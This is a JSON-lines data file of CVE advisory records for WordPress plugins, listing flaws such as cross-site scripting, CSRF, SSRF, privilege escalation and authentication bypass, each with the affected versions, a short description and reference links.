{"CVE_ID":"CVE-2024-3978","slug":"wp-jitsi-shortcodes","versionImpact":"0.1","description":"The WordPress Jitsi Shortcode WordPress plugin through 0.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a9f47d11-47ac-4998-a82a-dc2f3b0decdf\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a9f47d11-47ac-4998-a82a-dc2f3b0decdf\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5479","slug":"easy-pixels-by-jevnet","versionImpact":"2.13","description":"The Easy Pixels plugin for WordPress is vulnerable to Stored Cross-Site Scripting via plugin settings in all versions up to, and including, 2.13 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a397025-ada7-4a59-80b9-5a778ea27776?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a397025-ada7-4a59-80b9-5a778ea27776?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-pixels-by-jevnet\\\/trunk\\\/admin\\\/easyPixelsAdmin.php#L48\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-pixels-by-jevnet\\\/trunk\\\/admin\\\/easyPixelsAdmin.php#L48\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-pixels-by-jevnet\\\/trunk\\\/easyPixels.php#L66\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-pixels-by-jevnet\\\/trunk\\\/easyPixels.php#L66\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-pixels-by-jevnet\\\/trunk\\\/classes\\\/easy-pixels.php#L87\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-pixels-by-jevnet\\\/trunk\\\/classes\\\/easy-pixels.php#L87\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11365","slug":"security-force","versionImpact":"1.1.6","description":"The Crypto and DeFi Widgets \u2013 Web3 Cryptocurrency Shortcodes plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.1.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/security-force\\\/trunk\\\/lib\\\/class.settings-api.php#L2460\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/security-force\\\/trunk\\\/lib\\\/class.settings-api.php#L2460\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/security-force\\\/trunk\\\/lib\\\/class.settings-api.php#L2497\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/security-force\\\/trunk\\\/lib\\\/class.settings-api.php#L2497\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dead051c-f28f-4859-b0ba-b27a8d6c9335?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dead051c-f28f-4859-b0ba-b27a8d6c9335?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12454","slug":"slicewp","versionImpact":"1.1.23","description":"The Affiliate Program Suite \u2014 SliceWP Affiliates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.23. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slicewp\\\/tags\\\/1.1.23\\\/includes\\\/admin\\\/settings\\\/views\\\/view-settings-tab-general.php#L437\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slicewp\\\/tags\\\/1.1.23\\\/includes\\\/admin\\\/settings\\\/views\\\/view-settings-tab-general.php#L437\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slicewp\\\/tags\\\/1.1.23\\\/includes\\\/admin\\\/settings\\\/views\\\/view-settings-tab-general.php#L451\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slicewp\\\/tags\\\/1.1.23\\\/includes\\\/admin\\\/settings\\\/views\\\/view-settings-tab-general.php#L451\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slicewp\\\/trunk\\\/includes\\\/admin\\\/settings\\\/functions-actions-settings.php#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slicewp\\\/trunk\\\/includes\\\/admin\\\/settings\\\/functions-actions-settings.php#L14\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3207576\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3207576\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/slicewp\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/slicewp\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73aad911-531b-4118-9d39-27cbae75db01?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73aad911-531b-4118-9d39-27cbae75db01?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12826","slug":"personalize-woocommerce-cart-page","versionImpact":"3.5","description":"The GoHero Store Customizer for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the wooh_action_settings_save_frontend() function in all versions up to, and including, 3.5. This makes it possible for unauthenticated attackers to update limited plugin settings.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/personalize-woocommerce-cart-page\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/personalize-woocommerce-cart-page\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f65ee908-004f-4526-aeca-41b36522bb30?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f65ee908-004f-4526-aeca-41b36522bb30?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13905","slug":"onestore-sites","versionImpact":"0.1.1","description":"The OneStore Sites plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 0.1.1 via the class-export.php file. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/onestore-sites\\\/trunk\\\/classess\\\/class-export.php#L3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/onestore-sites\\\/trunk\\\/classess\\\/class-export.php#L3\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f2c70d5f-beb3-480e-8ea8-c3ab01ce5a20?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f2c70d5f-beb3-480e-8ea8-c3ab01ce5a20?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10632","slug":"nokaut-offers-box","versionImpact":"1.4.0","description":"The Nokaut Offers Box WordPress plugin through 1.4.0 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/17afba70-f213-47f6-aea2-59288ca92549\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/17afba70-f213-47f6-aea2-59288ca92549\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5288","slug":"import-export-with-custom-rest-api","description":"The REST API | Custom API Generator For Cross Platform And Import Export In WP plugin for WordPress is vulnerable to Privilege Escalation due to a missing capability check on the process_handler() function in versions 1.0.0 to 2.0.3. This makes it possible for unauthenticated attackers to POST an arbitrary import_api URL, import specially crafted JSON, and thereby create a new user with full Administrator privileges.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/import-export-with-custom-rest-api\\\/tags\\\/2.0.3\\\/backend\\\/methods\\\/wot-rapi-import-functions.php#L123\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/import-export-with-custom-rest-api\\\/tags\\\/2.0.3\\\/backend\\\/methods\\\/wot-rapi-import-functions.php#L123\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/import-export-with-custom-rest-api\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/import-export-with-custom-rest-api\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e2774fc-f028-436c-a8af-3c17378b9743?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e2774fc-f028-436c-a8af-3c17378b9743?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7688","slug":"add-user-meta","versionImpact":"1.0.1","description":"The Add User Meta plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.1. This is due to missing or incorrect nonce validation on the 'add-user-meta' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-user-meta\\\/trunk\\\/plugin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-user-meta\\\/trunk\\\/plugin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/add-user-meta\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/add-user-meta\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1535a174-ab59-4c6e-8080-ef818e00b070?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1535a174-ab59-4c6e-8080-ef818e00b070?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1155","slug":"nd-projects","versionImpact":"1.8","description":"The Cost Calculator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the nd_cc_meta_box_cc_price_icon parameter in versions up to, and including, 1.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/750be90d-dc12-4974-8921-75259d56c7b3\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/750be90d-dc12-4974-8921-75259d56c7b3\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/nd-projects\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/nd-projects\\\/#developers\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2171","slug":"badgeos","versionImpact":"3.7.1.6","description":"The BadgeOS plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in versions up to, and including, 3.7.1.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/shortcodes\\\/badgeos_achievement.php#L125\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/shortcodes\\\/badgeos_achievement.php#L125\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/74a280e1-e4b6-4bd9-882b-d9f185332d61?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/74a280e1-e4b6-4bd9-882b-d9f185332d61?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5740","slug":"wp-facebook-messenger","versionImpact":"1.0","description":"The Live Chat with Facebook Messenger plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'messenger' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa32a790-242f-4142-9f4d-e1b2a07045bb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa32a790-242f-4142-9f4d-e1b2a07045bb?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-facebook-messenger\\\/trunk\\\/frontend\\\/shortcode.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-facebook-messenger\\\/trunk\\\/frontend\\\/shortcode.php#L22\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-facebook-messenger\\\/trunk\\\/frontend\\\/shortcode.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-facebook-messenger\\\/trunk\\\/frontend\\\/shortcode.php#L32\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4627","slug":"ladipage","versionImpact":"4.4","description":"The LadiApp plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_config() function in versions up to, and including, 4.4. This makes it possible for authenticated attackers with subscriber-level access and above to update the 'ladipage_config' option.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d8074af6-cb2c-44db-9110-517f33caa96e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d8074af6-cb2c-44db-9110-517f33caa96e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ladipage\\\/trunk\\\/ladipage.php#L1971\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ladipage\\\/trunk\\\/ladipage.php#L1971\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-32700","slug":"chatbot-chatgpt","versionImpact":"2.0.0","description":"Unrestricted Upload of File with Dangerous Type vulnerability in Kognetiks Kognetiks Chatbot for WordPress chatbot-chatgpt. This issue affects Kognetiks Chatbot for WordPress: from n\/a through 2.0.0.\n\n","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/chatbot-chatgpt\\\/wordpress-kognetiks-chatbot-for-wordpress-plugin-2-0-0-arbitrary-file-upload-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/chatbot-chatgpt\\\/wordpress-kognetiks-chatbot-for-wordpress-plugin-2-0-0-arbitrary-file-upload-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4356","slug":"list-categories","versionImpact":"0.4","description":"The List categories plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'categories' shortcode in all versions up to, and including, 0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e24306a-b741-4840-b238-e37138425bf8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e24306a-b741-4840-b238-e37138425bf8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/list-categories\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/list-categories\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3977","slug":"wp-jitsi-shortcodes","versionImpact":"0.1","description":"The WordPress Jitsi Shortcode WordPress plugin through 0.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/25851386-eccf-49cb-afbf-c25286c9b19e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/25851386-eccf-49cb-afbf-c25286c9b19e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5457","slug":"pandavideo","versionImpact":"1.4.0","description":"The Panda Video plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018id\u2019 parameter in all versions up to, and including, 1.4.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/91a9dcf2-ba6b-4d03-9cdf-f50ea0d259d8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/91a9dcf2-ba6b-4d03-9cdf-f50ea0d259d8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pandavideo\\\/trunk\\\/includes\\\/assets\\\/buttons\\\/button-1.php#L6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pandavideo\\\/trunk\\\/includes\\\/assets\\\/buttons\\\/button-1.php#L6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pandavideo\\\/trunk\\\/includes\\\/assets\\\/buttons\\\/button-2.php#L7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pandavideo\\\/trunk\\\/includes\\\/assets\\\/buttons\\\/button-2.php#L7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pandavideo\\\/trunk\\\/includes\\\/assets\\\/buttons\\\/button-3.php#L8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pandavideo\\\/trunk\\\/includes\\\/assets\\\/buttons\\\/button-3.php#L8\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8723","slug":"012-ps-multi-languages","versionImpact":"1.6","description":"The 012 Ps Multi Languages plugin for WordPress is vulnerable to Stored Cross-Site Scripting via translated titles in all versions up to, and including, 1.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30a1517e-5ea5-47a1-afe8-9543e1ffd199?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30a1517e-5ea5-47a1-afe8-9543e1ffd199?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/012-ps-multi-languages\\\/trunk\\\/includes\\\/ps-multilingual-edit-post.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/012-ps-multi-languages\\\/trunk\\\/includes\\\/ps-multilingual-edit-post.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9893","slug":"nextend-facebook-connect","versionImpact":"3.1.14","description":"The Nextend Social Login Pro plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 3.1.14. This is due to insufficient verification on the user being returned by the social login token. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email and the user does not have an already-existing account for the service returning the token.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e4588d1-f21e-48ba-a8cb-d18c421f000a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e4588d1-f21e-48ba-a8cb-d18c421f000a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/nextendweb.com\\\/social-login\\\/\",\"name\":\"https:\\\/\\\/nextendweb.com\\\/social-login\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/nextend-facebook-connect\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/nextend-facebook-connect\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9896","slug":"bbp-core","versionImpact":"1.2.5","description":"The BBP Core \u2013 Expand bbPress powered forums with useful features plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.2.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a329cf0a-8800-470a-9657-452f26112956?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a329cf0a-8800-470a-9657-452f26112956?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bbp-core\\\/trunk\\\/includes\\\/features\\\/bbpc_attachments\\\/code\\\/front.php#L284\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bbp-core\\\/trunk\\\/includes\\\/features\\\/bbpc_attachments\\\/code\\\/front.php#L284\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bbp-core\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bbp-core\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3179353\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3179353\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12817","slug":"etsy-importer","versionImpact":"1.4.2","description":"The Etsy Importer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'product_link' shortcode in all versions up to, and including, 1.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/etsy-importer\\\/trunk\\\/includes\\\/shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/etsy-importer\\\/trunk\\\/includes\\\/shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/etsy-importer\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/etsy-importer\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b9d77b08-3a4a-441b-8725-fd93744de73c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b9d77b08-3a4a-441b-8725-fd93744de73c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12386","slug":"wp-abstracts-manuscripts-manager","versionImpact":"2.7.3","description":"The WP Abstracts plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.7.3. This is due to missing nonce validation on multiple functions. This makes it possible for unauthenticated attackers to delete arbitrary accounts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3238664\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3238664\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-abstracts-manuscripts-manager\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-abstracts-manuscripts-manager\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/efd27466-f68e-4d8a-a1ec-90dbb6ff126b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/efd27466-f68e-4d8a-a1ec-90dbb6ff126b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
